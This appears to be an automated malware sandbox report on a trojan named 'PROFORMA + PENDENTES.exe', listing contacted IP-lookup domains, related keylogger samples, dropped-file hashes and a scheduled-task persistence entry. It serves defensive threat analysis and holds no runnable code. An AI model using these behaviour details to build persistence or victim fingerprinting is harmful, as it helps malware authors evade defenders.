                          http://checkip.dyndns.org/qPROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            high
                            http://crl.mvWYqxTmjfOgdZ.exe, 00000010.00000002.1694863278.0000000006560000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.google.com/#q=PROFORMA + PENDENTES.exe, WYqxTmjfOgdZ.exe.0.drfalse
                              high
                              http://reallyfreegeoip.orgPROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://reallyfreegeoip.orgPROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://checkip.dyndns.orgPROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E22000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.comPROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 0000000C.00000002.1547422246.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.org/xml/155.94.241.187$PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://reallyfreegeoip.org/xml/PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            188.114.97.3
                                            reallyfreegeoip.orgEuropean Union
                                            13335CLOUDFLARENETUSfalse
                                            158.101.44.242
                                            checkip.dyndns.comUnited States
                                            31898ORACLE-BMC-31898USfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1557908
                                            Start date and time:2024-11-18 18:17:39 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 24s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:27
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:PROFORMA + PENDENTES.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@33/15@3/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 216
                                            • Number of non-executed functions: 11
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target PROFORMA + PENDENTES.exe, PID 3636 because it is empty
                                            • Execution Graph export aborted for target WYqxTmjfOgdZ.exe, PID 5420 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • VT rate limit hit for: PROFORMA + PENDENTES.exe
                                            TimeTypeDescription
                                            12:18:37API Interceptor98x Sleep call for process: PROFORMA + PENDENTES.exe modified
                                            12:18:42API Interceptor32x Sleep call for process: powershell.exe modified
                                            12:18:44API Interceptor104x Sleep call for process: WYqxTmjfOgdZ.exe modified
                                            18:18:44Task SchedulerRun new task: WYqxTmjfOgdZ path: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            188.114.97.3PO 20495088.exeGet hashmaliciousFormBookBrowse
                                            • www.ssrnoremt-rise.sbs/3jsc/
                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • filetransfer.io/data-package/zWkbOqX7/download
                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                            • kklk16.bsyo45ksda.top/favicon.ico
                                            gusetup.exeGet hashmaliciousUnknownBrowse
                                            • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                            Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                            • gmtagency.online/api/check
                                            View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htmGet hashmaliciousUnknownBrowse
                                            • f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
                                            SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                            • paste.ee/d/YU1NN
                                            TT copy.exeGet hashmaliciousFormBookBrowse
                                            • www.lnnn.fun/u5w9/
                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • filetransfer.io/data-package/iiEh1iM3/download
                                            Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • paste.ee/d/dc8Ru
                                            158.101.44.242#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                            • checkip.dyndns.org/
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • checkip.dyndns.org/
                                            CloudServices.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • checkip.dyndns.org/
                                            SOF-41593-21052024112851.exeGet hashmaliciousMassLogger RATBrowse
                                            • checkip.dyndns.org/
                                            Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                            • checkip.dyndns.org/
                                            rPONO17030099.exeGet hashmaliciousMassLogger RATBrowse
                                            • checkip.dyndns.org/
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            reallyfreegeoip.orgQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                            • 188.114.96.3
                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 104.21.67.152
                                            New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                            • 188.114.96.3
                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 188.114.97.3
                                            checkip.dyndns.comQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.6.168
                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                            • 132.226.247.73
                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 193.122.130.0
                                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                            • 193.122.6.168
                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 193.122.6.168
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.96.3
                                            MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                            • 172.67.208.107
                                            payload.vbsGet hashmaliciousUnknownBrowse
                                            • 172.67.165.138
                                            phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                            • 188.114.96.3
                                            DRP130636747.pdfGet hashmaliciousUnknownBrowse
                                            • 104.18.10.207
                                            gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                            • 104.26.12.205
                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                            • 188.114.97.3
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 188.114.96.3
                                            https://t.co/D4HGMmKLnLGet hashmaliciousUnknownBrowse
                                            • 162.159.140.229
                                            ORACLE-BMC-31898USQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 193.122.6.168
                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 193.122.130.0
                                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 193.122.6.168
                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                            • 193.122.6.168
                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 193.122.6.168
                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 158.101.44.242
                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 193.122.6.168
                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 158.101.44.242
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            54328bd36c14bd82ddaa0c04b25ed9adQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 188.114.97.3
                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            New Order_20241711.exeGet hashmaliciousMassLogger RATBrowse
                                            • 188.114.97.3
                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            New Order Data sheet Page.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 188.114.97.3
                                            Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 188.114.97.3
                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                            • 188.114.97.3
                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.97.3
                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                            • 188.114.97.3
                                            No context
                                            Process:C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1304
                                            Entropy (8bit):5.342479910699661
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                            MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                            SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                            SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                            SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                            Malicious:true
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e
                                            Process:C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1304
                                            Entropy (8bit):5.342479910699661
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                            MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                            SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                            SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                            SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2232
                                            Entropy (8bit):5.379552885213346
                                            Encrypted:false
                                            SSDEEP:48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//8M0Uyus:fLHxvCsIfA2KRHmOugw1s
                                            MD5:08C4BB62AB814866FFEF46F746CB9140
                                            SHA1:A24D7CCEC57571B1ADD96212CC8EB391982964E9
                                            SHA-256:BBF508C20A76CD57ADC1E12C9239C6A82F72BC034F3B01AF7F8C3FED34FE0A6B
                                            SHA-512:B69AA0C4455E7074715844071FE40CC5B4069D8D54AE37AC37762282AEEBEA04A2C3C3385B29ACB11FC8DA6A17D3C4F81BF6DF9AD3AEA3A7EC29255B7CE3D231
                                            Malicious:false
                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
